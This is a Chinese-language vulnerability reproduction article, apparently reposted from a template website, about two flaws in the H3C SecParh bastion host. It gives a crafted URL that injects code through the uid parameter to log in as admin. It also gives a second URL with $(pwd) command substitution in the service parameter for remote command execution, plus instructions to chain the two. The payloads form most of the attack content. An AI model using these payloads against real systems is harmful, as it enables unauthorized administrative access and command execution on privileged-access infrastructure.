1.H3C SecParh堡壘機(jī)任意用戶登錄漏洞
1.1.漏洞描述
??在H3C SecParh堡壘機(jī) get_detail_view.php 存在任意用戶登錄漏洞。
1.2.漏洞影響
??H3C SecParh堡壘機(jī)
1.3.漏洞復(fù)現(xiàn)
1.3.1.登錄頁面
??該漏洞版本的登錄頁面如下,2018年的。
1.3.2.構(gòu)建URL
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
1.4.總結(jié)
??這里確實成功登錄上去了,若設(shè)定三權(quán)的話,可能存在把a(bǔ)dmin用戶設(shè)定為類似與這里的審計管理員,那么就需要測試是否能夠跳轉(zhuǎn)到操作管理員或者其它的一些管理員賬號上去。這里就不再深入測試,只是提供一個思路。
2.H3C SecParh堡壘機(jī)遠(yuǎn)程命令執(zhí)行漏洞
2.1.漏洞描述
??H3C SecParh堡壘機(jī)data_provider.php存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者通過任意用戶登錄或者賬號密碼進(jìn)入后臺就可以構(gòu)造特殊的請求執(zhí)行命令。
2.2.漏洞影響
??H3C SecParh堡壘機(jī)
2.3.漏洞復(fù)現(xiàn)
2.3.1.登錄頁面
??該漏洞版本的登錄頁面如下,2018年的。
2.3.2.構(gòu)建URL
URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true
??需要注意一定要通過先通過任意用戶登錄獲取Cookie,然后在URL中service后面的括號中輸入想要執(zhí)行的命令,即可實現(xiàn)遠(yuǎn)程命令執(zhí)行。文章來源:http://www.zghlxwxcb.cn/news/detail-448558.html
2.4.總結(jié)
??我使用火狐瀏覽器,我訪問后就自動將信息進(jìn)行下載,不過也有瀏覽器直接跳轉(zhuǎn)界面的也行,都能夠看到。文章來源地址http://www.zghlxwxcb.cn/news/detail-448558.html
到了這里,關(guān)于H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!